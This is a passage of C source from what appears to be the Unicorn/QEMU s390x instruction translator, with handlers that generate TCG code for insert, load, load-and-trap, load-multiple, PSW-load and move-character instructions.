one_insert: pos = base + ctz32(m3) * 8; tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, tmp, pos, len); ccm = ((1ull << len) - 1) << pos; break; default: /* This is going to be a sequence of loads and inserts. */ pos = base + 32 - 8; ccm = 0; while (m3) { if (m3 & 0x8) { tcg_gen_qemu_ld8u(tcg_ctx, tmp, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, tmp, pos, 8); ccm |= 0xff << pos; } m3 = (m3 << 1) & 0xf; pos -= 8; } break; } tcg_gen_movi_i64(tcg_ctx, tmp, ccm); gen_op_update2_cc_i64(s, CC_OP_ICM, tmp, o->out); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_insi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; tcg_gen_deposit_i64(tcg_ctx, o->out, o->in1, o->in2, shift, size); return DISAS_NEXT; } static DisasJumpType op_ipm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1, t2; gen_op_calc_cc(s); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extract_i64(tcg_ctx, t1, tcg_ctx->psw_mask, 40, 4); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t2, tcg_ctx->cc_op); tcg_gen_deposit_i64(tcg_ctx, t1, t1, t2, 4, 60); tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, t1, 24, 8); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); return DISAS_NEXT; } static DisasJumpType op_idte(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m4; if (s390_has_feat(s->uc, S390_FEAT_LOCAL_TLB_CLEARING)) { m4 = tcg_const_i32(tcg_ctx, get_field(s, m4)); } else { m4 = tcg_const_i32(tcg_ctx, 0); } gen_helper_idte(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2, m4); tcg_temp_free_i32(tcg_ctx, m4); return DISAS_NEXT; } static DisasJumpType op_ipte(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m4; if (s390_has_feat(s->uc, S390_FEAT_LOCAL_TLB_CLEARING)) { m4 = tcg_const_i32(tcg_ctx, get_field(s, m4)); } else { m4 = tcg_const_i32(tcg_ctx, 0); } gen_helper_ipte(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2, m4); tcg_temp_free_i32(tcg_ctx, m4); return DISAS_NEXT; } static DisasJumpType op_iske(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_iske(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_msa(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = have_field(s, r1) ? get_field(s, r1) : 0; int r2 = have_field(s, r2) ? get_field(s, r2) : 0; int r3 = have_field(s, r3) ? get_field(s, r3) : 0; TCGv_i32 t_r1, t_r2, t_r3, type; switch (s->insn->data) { case S390_FEAT_TYPE_KMCTR: if (r3 & 1 || !r3) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* FALL THROUGH */ case S390_FEAT_TYPE_PPNO: case S390_FEAT_TYPE_KMF: case S390_FEAT_TYPE_KMC: case S390_FEAT_TYPE_KMO: case S390_FEAT_TYPE_KM: if (r1 & 1 || !r1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* FALL THROUGH */ case S390_FEAT_TYPE_KMAC: case S390_FEAT_TYPE_KIMD: case S390_FEAT_TYPE_KLMD: if (r2 & 1 || !r2) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* FALL THROUGH */ case S390_FEAT_TYPE_PCKMO: case S390_FEAT_TYPE_PCC: break; default: // g_assert_not_reached(); break; }; t_r1 = tcg_const_i32(tcg_ctx, r1); t_r2 = tcg_const_i32(tcg_ctx, r2); t_r3 = tcg_const_i32(tcg_ctx, r3); type = tcg_const_i32(tcg_ctx, s->insn->data); gen_helper_msa(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t_r1, t_r2, t_r3, type); set_cc_static(s); tcg_temp_free_i32(tcg_ctx, t_r1); tcg_temp_free_i32(tcg_ctx, t_r2); tcg_temp_free_i32(tcg_ctx, t_r3); tcg_temp_free_i32(tcg_ctx, type); return DISAS_NEXT; } static DisasJumpType op_keb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_keb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_kdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_kdb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_kxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_kxb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_laa(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the addition for the computation of CC. */ tcg_gen_atomic_fetch_add_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the addition for setting CC. */ tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_lan(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the addition for the computation of CC. */ tcg_gen_atomic_fetch_and_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the operation for setting CC. */ tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_lao(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the addition for the computation of CC. */ tcg_gen_atomic_fetch_or_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the operation for setting CC. */ tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_lax(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the addition for the computation of CC. */ tcg_gen_atomic_fetch_xor_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the operation for setting CC. */ tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ldeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ldeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_ledb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_ledb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_ldxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_ldxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_lexb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_lexb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_lxdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_lxdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_lxeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_lxeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_lde(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shli_i64(tcg_ctx, o->out, o->in2, 32); return DISAS_NEXT; } static DisasJumpType op_llgt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, 0x7fffffff); return DISAS_NEXT; } static DisasJumpType op_ld8s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld8s(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld8u(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld16s(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld16u(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld32s(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld32u(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld64(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_lat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); store_reg32_i64(tcg_ctx, get_field(s, r1), o->in2); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->in2, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_lgat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, o->out, o->in2, get_mem_index(s)); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->out, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_lfhat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); store_reg32h_i64(tcg_ctx, get_field(s, r1), o->in2); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->in2, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_llgfat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, o->out, o->in2, get_mem_index(s)); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->out, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_llgtat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, 0x7fffffff); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->out, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_loc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; disas_jcc(s, &c, get_field(s, m3)); if (c.is_64) { tcg_gen_movcond_i64(tcg_ctx, c.cond, o->out, c.u.s64.a, c.u.s64.b, o->in2, o->in1); free_compare(tcg_ctx, &c); } else { TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 t, z; tcg_gen_setcond_i32(tcg_ctx, c.cond, t32, c.u.s32.a, c.u.s32.b); free_compare(tcg_ctx, &c); t = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t, t32); tcg_temp_free_i32(tcg_ctx, t32); z = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, o->out, t, z, o->in2, o->in1); tcg_temp_free_i64(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, z); } return DISAS_NEXT; } static DisasJumpType op_lctl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_lctl(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. */ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_lctlg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_lctlg(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. */ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_lra(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_lra(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_lpp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_st_i64(tcg_ctx, o->in2, tcg_ctx->cpu_env, offsetof(CPUS390XState, pp)); return DISAS_NEXT; } static DisasJumpType op_lpsw(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1, t2; per_breaking_event(s); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->in2, get_mem_index(s), MO_TEUL | MO_ALIGN_8); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 4); tcg_gen_qemu_ld32u(tcg_ctx, t2, o->in2, get_mem_index(s)); /* Convert the 32-bit PSW_MASK into the 64-bit PSW_MASK. */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 32); gen_helper_load_psw(tcg_ctx, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); return DISAS_NORETURN; } static DisasJumpType op_lpswe(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1, t2; per_breaking_event(s); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->in2, get_mem_index(s), MO_TEQ | MO_ALIGN_8); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 8); tcg_gen_qemu_ld64(tcg_ctx, t2, o->in2, get_mem_index(s)); gen_helper_load_psw(tcg_ctx, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); return DISAS_NORETURN; } static DisasJumpType op_lam(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_lam(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_lm32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t1, t2; /* Only one register to read. */ t1 = tcg_temp_new_i64(tcg_ctx); if (unlikely(r1 == r3)) { tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32_i64(tcg_ctx, r1, t1); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* First load the values of the first and last registers to trigger possible page faults. */ t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, t2, o->in2, 4 * ((r3 - r1) & 15)); tcg_gen_qemu_ld32u(tcg_ctx, t2, t2, get_mem_index(s)); store_reg32_i64(tcg_ctx, r1, t1); store_reg32_i64(tcg_ctx, r3, t2); /* Only two registers to read. */ if (((r1 + 1) & 15) == r3) { tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* Then load the remaining registers. Page fault can't occur. */ r3 = (r3 - 1) & 15; tcg_gen_movi_i64(tcg_ctx, t2, 4); while (r1 != r3) { r1 = (r1 + 1) & 15; tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t2); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32_i64(tcg_ctx, r1, t1); } tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_lmh(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t1, t2; /* Only one register to read. */ t1 = tcg_temp_new_i64(tcg_ctx); if (unlikely(r1 == r3)) { tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32h_i64(tcg_ctx, r1, t1); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* First load the values of the first and last registers to trigger possible page faults. */ t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, t2, o->in2, 4 * ((r3 - r1) & 15)); tcg_gen_qemu_ld32u(tcg_ctx, t2, t2, get_mem_index(s)); store_reg32h_i64(tcg_ctx, r1, t1); store_reg32h_i64(tcg_ctx, r3, t2); /* Only two registers to read. */ if (((r1 + 1) & 15) == r3) { tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* Then load the remaining registers. Page fault can't occur. */ r3 = (r3 - 1) & 15; tcg_gen_movi_i64(tcg_ctx, t2, 4); while (r1 != r3) { r1 = (r1 + 1) & 15; tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t2); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32h_i64(tcg_ctx, r1, t1); } tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_lm64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t1, t2; /* Only one register to read. */ if (unlikely(r1 == r3)) { tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); return DISAS_NEXT; } /* First load the values of the first and last registers to trigger possible page faults. */ t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, t2, o->in2, 8 * ((r3 - r1) & 15)); tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r3], t2, get_mem_index(s)); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->regs[r1], t1); tcg_temp_free(tcg_ctx, t2); /* Only two registers to read. */ if (((r1 + 1) & 15) == r3) { tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* Then load the remaining registers. Page fault can't occur. */ r3 = (r3 - 1) & 15; tcg_gen_movi_i64(tcg_ctx, t1, 8); while (r1 != r3) { r1 = (r1 + 1) & 15; tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t1); tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); } tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_lpd(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 a1, a2; MemOp mop = s->insn->data; /* In a parallel context, stop the world and single step. */ if (tb_cflags(s->base.tb) & CF_PARALLEL) { update_psw_addr(s); update_cc_op(s); gen_exception(tcg_ctx, EXCP_ATOMIC); return DISAS_NORETURN; } /* In a serial context, perform the two loads ... */ a1 = get_address(s, 0, get_field(s, b1), get_field(s, d1)); a2 = get_address(s, 0, get_field(s, b2), get_field(s, d2)); tcg_gen_qemu_ld_i64(tcg_ctx, o->out, a1, get_mem_index(s), mop | MO_ALIGN); tcg_gen_qemu_ld_i64(tcg_ctx, o->out2, a2, get_mem_index(s), mop | MO_ALIGN); tcg_temp_free_i64(tcg_ctx, a1); tcg_temp_free_i64(tcg_ctx, a2); /* ... and indicate that we performed them while interlocked. */ gen_op_movi_cc(s, 0); return DISAS_NEXT; } static DisasJumpType op_lpq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_lpq(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); } else if (HAVE_ATOMIC128) { gen_helper_lpq_parallel(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NORETURN; } return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_lura(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->addr1 = get_address(s, 0, get_field(s, r2), 0); tcg_gen_qemu_ld_tl(tcg_ctx, o->out, o->addr1, MMU_REAL_IDX, s->insn->data); return DISAS_NEXT; } static DisasJumpType op_lzrb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, -256); return DISAS_NEXT; } static DisasJumpType op_lcbb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int64_t block_size = (1ull << (get_field(s, m3) + 6)); if (get_field(s, m3) > 6) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tcg_gen_ori_i64(tcg_ctx, o->addr1, o->addr1, -block_size); tcg_gen_neg_i64(tcg_ctx, o->addr1, o->addr1); tcg_gen_movi_i64(tcg_ctx, o->out, 16); tcg_gen_umin_i64(tcg_ctx, o->out, o->out, o->addr1); gen_op_update1_cc_i64(s, CC_OP_LCBB, o->out); return DISAS_NEXT; } static DisasJumpType op_mov2(DisasContext *s, DisasOps *o) { o->out = o->in2; o->g_out = o->g_in2; o->in2 = NULL; o->g_in2 = false; return DISAS_NEXT; } static DisasJumpType op_mov2e(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b2 = get_field(s, b2); TCGv ar1 = tcg_temp_new_i64(tcg_ctx); o->out = o->in2; o->g_out = o->g_in2; o->in2 = NULL; o->g_in2 = false; switch (s->base.tb->flags & FLAG_MASK_ASC) { case PSW_ASC_PRIMARY >> FLAG_MASK_PSW_SHIFT: tcg_gen_movi_i64(tcg_ctx, ar1, 0); break; case PSW_ASC_ACCREG >> FLAG_MASK_PSW_SHIFT: tcg_gen_movi_i64(tcg_ctx, ar1, 1); break; case PSW_ASC_SECONDARY >> FLAG_MASK_PSW_SHIFT: if (b2) { tcg_gen_ld32u_i64(tcg_ctx, ar1, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[b2])); } else { tcg_gen_movi_i64(tcg_ctx, ar1, 0); } break; case PSW_ASC_HOME >> FLAG_MASK_PSW_SHIFT: tcg_gen_movi_i64(tcg_ctx, ar1, 2); break; } tcg_gen_st32_i64(tcg_ctx, ar1, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[1])); tcg_temp_free_i64(tcg_ctx, ar1); return DISAS_NEXT; } static DisasJumpType op_movx(DisasContext *s, DisasOps *o) { o->out = o->in1; o->out2 = o->in2; o->g_out = o->g_in1; o->g_out2 = o->g_in2; o->in1 = NULL; o->in2 = NULL; o->g_in1 = o->g_in2 = false; return DISAS_NEXT; } static DisasJumpType op_mvc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvc(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvcin(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvcin(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvcl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i32 t1, t2; /* r1 and r2 must be even. */ if (r1 & 1 || r2 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t2 = tcg_const_i32(tcg_ctx, r2); gen_helper_mvcl(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. */ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_mvcle(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvclu(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. */ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_mvclu(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcos(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); gen_helper_mvcos(tcg_ctx, tcg_ctx->cc_op, 